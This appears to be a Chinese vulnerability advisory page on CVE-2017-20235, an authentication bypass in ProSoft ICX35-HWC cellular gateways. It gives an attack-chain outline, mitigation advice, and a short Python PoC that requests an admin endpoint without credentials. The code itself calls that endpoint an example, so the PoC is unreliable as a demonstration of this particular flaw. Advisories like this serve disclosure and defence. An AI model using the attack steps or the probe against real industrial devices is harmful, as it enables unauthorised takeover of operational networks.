IPBUF安全漏洞报告
English
CVE-2017-20235 CVSS 9.1 严重

CVE-2017-20235 ProSoft网关身份验证绕过漏洞

披露日期: 2026-04-03
来源: [email protected]

漏洞信息

漏洞编号
CVE-2017-20235
漏洞类型
认证绕过
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ProSoft Technology ICX35-HWC 蜂窝网关

相关标签

认证绕过IoTProSoftICS远程代码执行

漏洞概述

ProSoft Technology ICX35-HWC蜂窝网关1.3及更早版本在Web用户界面中存在严重的身份验证绕过漏洞。未经身份验证的远程攻击者可利用此缺陷绕过正常的登录验证流程,无需凭据即可直接获取设备的管理员权限。成功利用该漏洞后,攻击者能够完全控制设备的配置和敏感设置,导致设备安全性完全失效。

技术细节

该漏洞的根本原因在于设备Web用户界面(UI)的认证逻辑存在设计缺陷。在受影响的固件版本中,系统对特定管理端点的访问控制实施不当,未能正确验证用户的身份凭证或会话令牌。攻击者可以通过发送特制的HTTP请求,直接访问受限的管理功能,从而绕过身份验证检查。由于攻击复杂度低且无需用户交互,攻击者可在网络范围内轻易扫描并利用此漏洞。一旦利用成功,攻击者将获得高等级的机密性和完整性权限,能够篡改设备配置、窃取敏感数据或破坏网络连接。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络或互联网,识别暴露的ProSoft Technology ICX35-HWC设备。
STEP 2
2. 漏洞利用
攻击者向目标设备的Web管理端口发送特制的HTTP请求,利用认证逻辑缺陷绕过登录界面。
STEP 3
3. 权限提升
由于认证被绕过,系统默认将请求视为管理员操作,攻击者获得对设备配置和设置的完全访问权限。
STEP 4
4. 持久化与破坏
攻击者修改设备配置、窃取敏感数据或植入后门,可能导致设备断网或被用作跳板攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): """ PoC for CVE-2017-20235 Authentication Bypass Attempts to access the admin configuration page without credentials. """ # Example endpoint that should be protected target_url = f"http://{target_ip}/admin/config.cgi" try: # Send request without authentication headers/cookies response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Authentication bypass successful!") print(f"[+] Admin panel accessible at: {target_url}") return True else: print("[-] Exploit failed or endpoint not reachable.") return False except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python poc.py <target_ip>") else: exploit(sys.argv[1])

影响范围

ProSoft Technology ICX35-HWC <= 1.3

防御指南

临时缓解措施
如果无法立即升级固件,建议通过防火墙或ACL严格限制访问设备Web管理界面的IP地址,仅允许受信任的管理主机连接。同时,应监控设备日志,检测是否存在未经授权的配置更改尝试。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表